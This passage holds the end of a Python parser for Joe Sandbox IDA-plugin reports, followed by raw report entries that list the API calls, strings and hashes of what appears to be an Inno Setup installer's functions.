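        elif section == "Similarity" and (m := KV_RE.match(line)):
            cur.ids[m["k"]] = m["v"]
        elif section == "Uniqueness" and (m := SCORE_RE.match(line)):
            cur.uniqueness = float(m["v"])
    return entries

def api_sequence(entry):
    """Direct calls in call-site address order; subcalls belong to other functions.
    Address order is static layout, not proven execution order."""
    return [c.name for c in sorted(entry.apis, key=lambda c: c.ref) if c.subcall_of is None]

def registry_paths(entry):
    """Hive-qualified key paths from Reg*KeyEx arguments plus bare key paths in Strings."""
    paths = set()
    for c in entry.apis:
        if c.name.startswith(("RegOpenKeyEx", "RegCreateKeyEx")) and len(c.args) >= 2:
            hive, sub = c.args[0], c.args[1]
            if isinstance(hive, int) and hive in HIVES and isinstance(sub, str):
                paths.add(f"{HIVES[hive]}\\{sub}")
    paths.update(s for s, _ in entry.strings if "\\" in s)
    return sorted(paths)

def wait_timeouts_ms(entry):
    """(api, call site, milliseconds) for wait/sleep calls whose timeout is a literal."""
    out = []
    for c in entry.apis:
        i = TIMEOUT_ARG.get(c.name)
        if i is not None and len(c.args) > i and isinstance(c.args[i], int):
            out.append((c.name, c.ref, c.args[i]))
    return out

# Constructed input: lines copied from the registry-probe and helper-process entries above.
SAMPLE = r"""
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,?,00000000,?,00000000,00454B0D,?,0045AB6A,00000003,00000000,00000000,00454B44), ref: 0045498D
Strings
• RegOpenKeyEx, xrefs: 00454910
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
• , xrefs: 004548FE
Similarity
• API String ID: 2812809588-1577016196
Uniqueness

Uniqueness Score: -1.00%

APIs
• CloseHandle.KERNEL32(?), ref: 00458A7B
• TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458A97
• WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458AA5
• GetExitCodeProcess.KERNEL32(?), ref: 00458AB6
• Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458B19
Strings
• Helper process exited, but failed to get exit code., xrefs: 00458AEF
• Helper isn't responding; killing it., xrefs: 00458A87
"""

if __name__ == "__main__":
    for n, e in enumerate(parse_summaries(SAMPLE), 1):
        print(f"entry {n}: {' -> '.join(api_sequence(e))}")
        print("  registry:", registry_paths(e), " timeouts:", wait_timeouts_ms(e))
```

Run it as a script, or feed it the saved text of a whole report with `parse_summaries(open(path, encoding="utf-8").read())`, then filter entries by `registry_paths` or by `ids["API String ID"]` to pivot between reports. Two things the parser deliberately does not do: it keeps `Part of subcall function` lines attached to the entry they appear in rather than attributing them to the callee, because the report only tells you the callee's address, and it never infers execution order from the `ref` addresses, since a kill path such as the one behind "Helper isn't responding; killing it." is a branch, not a straight line through the listed calls.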
APIs
  • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045464F
• RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045478B
  • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
Strings
• RegCreateKeyEx, xrefs: 004545C3
• , xrefs: 004545B1
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454597
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CloseCreateFormatMessageQueryValue
• String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                                                                                                                                                  • API String ID: 2481121983-1280779767
                                                                                                                                                                                                                                  • Opcode ID: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                                                                                                                                                                  • Instruction ID: 93c55a0ab54dbcba353dd8d7ef9dbdddde8d62e860aeeeeaccb8ee2ace91ec52
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49810F75A00209AFDB00DFD5C981BDEB7B8EB49309F10452AF900FB282D7789E45CB69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004538BC: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
  • Part of subcall function 004538BC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
• CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00496CCD
• SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496E21), ref: 00496CEE
• CreateWindowExA.USER32(00000000,STATIC,00496E30,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496D15
• SetWindowLongA.USER32(?,000000FC,004964A8), ref: 00496D28
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC,00496E30), ref: 00496D58
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00496DCC
• CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000), ref: 00496DD8
  • Part of subcall function 00453D30: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
• DestroyWindow.USER32(?,00496DFB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC), ref: 00496DEE
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
• String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
• API String ID: 1549857992-2312673372
• Opcode ID: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
• Instruction ID: 18f462a79ff6f3765b6ab1b49dcd34ad23a8ddcce266b6658739bc0f5698dca4
• Opcode Fuzzy Hash: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
• Instruction Fuzzy Hash: 61414C70A40208AFDF00EBA5DD42F9E7BB8EB08714F52457AF510F7291D7799E008B68
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E441
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E495
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressCloseHandleModuleProc
• String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$QaE$kernel32.dll
• API String ID: 4190037839-2312295185
• Opcode ID: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
• Instruction ID: f42d7e7755912f49377b3a3c2778cbb45b18f2cdc7334bb7b0fb93ca3fe573dd
• Opcode Fuzzy Hash: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
• Instruction Fuzzy Hash: E8213230B10225BBDB10EAE6DC51B9E76B8EB44308F90447BA504E7281E77CDE419B5C
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetActiveWindow.USER32 ref: 004629FC
• GetModuleHandleA.KERNEL32(user32.dll), ref: 00462A10
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462A1D
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462A2A
• GetWindowRect.USER32(?,00000000), ref: 00462A76
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462AB4
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Window$AddressProc$ActiveHandleModuleRect
• String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
• API String ID: 2610873146-3407710046
• Opcode ID: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
• Instruction ID: 865a179037155f8fdabe2954c964c2dd38b7d55406d5d1e7c7801a7b23b437f8
• Opcode Fuzzy Hash: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
• Instruction Fuzzy Hash: B7219575701B057BD610D6A88D85F3B36D8EB84715F094A2AF944DB3C1E6F8EC018B9A
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetActiveWindow.USER32 ref: 0042F194
• GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
• GetWindowRect.USER32(?,00000000), ref: 0042F20E
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F24C
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                                                                                                                                                  • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                                                                                                                                                  • API String ID: 2610873146-3407710046
                                                                                                                                                                                                                                  • Opcode ID: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                                                                                                                                                                  • Instruction ID: 50a2e38ba83faf67dd7c56e8d7733487d454ef14a416094e89dadcccf0bf0910
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3821F279704710ABD300EA68ED41F3B37A9DB89714F88457AF944DB382DA79EC044BA9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458DFB,?,00000000,00458E5E,?,?,020A3858,00000000), ref: 00458C79
• TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,020A3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CD6
• GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,020A3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CE3
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458D2F
• GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,020A3858,?,00000000,00458D90,?,00000000), ref: 00458D55
• GetLastError.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,020A3858,?,00000000,00458D90,?,00000000), ref: 00458D5C
  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
• String ID: CreateEvent$TransactNamedPipe
• API String ID: 2182916169-3012584893
• Opcode ID: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
• Instruction ID: 06b5d05a5e38ae799b2edb69ba26f0faef77b18cb4ad173b91f5c3c95d125767
• Opcode Fuzzy Hash: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
• Instruction Fuzzy Hash: EF418E75A00608AFDB15DF95C981F9EB7F8EB48714F1044AAF900F72D2DA789E44CA28
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456E85,?,?,00000031,?), ref: 00456D48
• GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456D4E
• LoadTypeLib.OLEAUT32(00000000,?), ref: 00456D9B
  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressErrorHandleLastLoadModuleProcType
• String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
• API String ID: 1914119943-2711329623
• Opcode ID: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
• Instruction ID: d1bb8c6bfccdc0522a96f5e3020b18907c52df716e7671809b7eaf465cfb4023
• Opcode Fuzzy Hash: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
• Instruction Fuzzy Hash: 6831A375A00604AFDB41EFAACC12D5BB7BDEB8970675244A6FD04D3352DB38DD08CA28
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RectVisible.GDI32(?,?), ref: 00416E13
• SaveDC.GDI32(?), ref: 00416E27
• IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E4A
• RestoreDC.GDI32(?,?), ref: 00416E65
• CreateSolidBrush.GDI32(00000000), ref: 00416EE5
• FrameRect.USER32(?,?,?), ref: 00416F18
• DeleteObject.GDI32(?), ref: 00416F22
• CreateSolidBrush.GDI32(00000000), ref: 00416F32
• FrameRect.USER32(?,?,?), ref: 00416F65
• DeleteObject.GDI32(?), ref: 00416F6F
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
• String ID:
• API String ID: 375863564-0
• Opcode ID: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
• Instruction ID: c082a38e55a2621cff38c0036c5e412d4739722926df34ebe37a7eff5f7859fc
• Opcode Fuzzy Hash: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
• Instruction Fuzzy Hash: 70515A712086459FDB50EF69C8C4B9B77E8AF48314F15466AFD488B286C738EC81CB99
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
• GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
• SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
• ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
• SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
• SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
• GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
• GetFileType.KERNEL32(?,000000F5), ref: 00404C11
• CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
• GetLastError.KERNEL32(000000F5), ref: 00404C46
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1694776339-0
                                                                                                                                                                                                                                  • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                                                                                                                                                  • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• GetSystemMenu.USER32(00000000,00000000), ref: 00422233
• DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422251
• DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042225E
• DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226B
• DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422278
• DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422285
• DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422292
• DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042229F
• EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222BD
• EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D9
Similarity
• API ID: Menu$Delete$EnableItem$System
• String ID:
• API String ID: 3985193851-0
• Opcode ID: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
• Instruction ID: 662ae76830c3dbb110fd6952920e185112f137d20e740dc0dcce1beff7d7cd05
• Opcode Fuzzy Hash: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
• Instruction Fuzzy Hash: AF2144703407047AE720E724CD8BF9BBBD89B04708F5451A5BA487F6D3C6F9AB804698
Uniqueness
Uniqueness Score: -1.00%

APIs
• FreeLibrary.KERNEL32(10000000), ref: 00481A11
• FreeLibrary.KERNEL32(00000000), ref: 00481A25
• SendNotifyMessageA.USER32(000104B0,00000496,00002710,00000000), ref: 00481A97
Strings
• DeinitializeSetup, xrefs: 0048190D
• Restarting Windows., xrefs: 00481A72
• Deinitializing Setup., xrefs: 00481872
• Not restarting Windows because Setup is being run from the debugger., xrefs: 00481A46
• GetCustomSetupExitCode, xrefs: 004818B1
Similarity
• API ID: FreeLibrary$MessageNotifySend
• String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
• API String ID: 3817813901-1884538726
• Opcode ID: 465e20e9b424049c750abeefdcaa0399268f60af279eeffeb6245f27988e7504
• Instruction ID: b122ee3e0244d1cffd13458a0655c780be2d4a3cdc4850abd58d30bc7702deed
• Opcode Fuzzy Hash: 465e20e9b424049c750abeefdcaa0399268f60af279eeffeb6245f27988e7504
• Instruction Fuzzy Hash: C651BF347042409FD715EB69E9A5B6E7BE8EB19314F10887BE800C72B2DB389C46CB5D
Uniqueness
Uniqueness Score: -1.00%

APIs
• SHGetMalloc.SHELL32(?), ref: 004616C7
• GetActiveWindow.USER32 ref: 0046172B
• CoInitialize.OLE32(00000000), ref: 0046173F
• SHBrowseForFolder.SHELL32(?), ref: 00461756
• 756CD120.OLE32(00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046176B
• SetActiveWindow.USER32(?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 00461781
• SetActiveWindow.USER32(?,?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046178A
Strings
Similarity
• API ID: ActiveWindow$BrowseD120FolderInitializeMalloc
• String ID: A
• API String ID: 2698730301-3554254475
• Opcode ID: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
• Instruction ID: 0f37cca2ee7d5c89cd5c8fe3b5c5f67eac08b275376d6c087401a1ac056189be
• Opcode Fuzzy Hash: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
• Instruction Fuzzy Hash: C3312F70E00348AFDB10EFA6D885A9EBBF8EB09304F55847AF404E7251E7785A048F59
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15,?,?,00000000,00472F84), ref: 00472A1C
  • Part of subcall function 0042CD94: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE0A
  • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
• SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15), ref: 00472A93
• RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000), ref: 00472A99
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
• String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
• API String ID: 884541143-1710247218
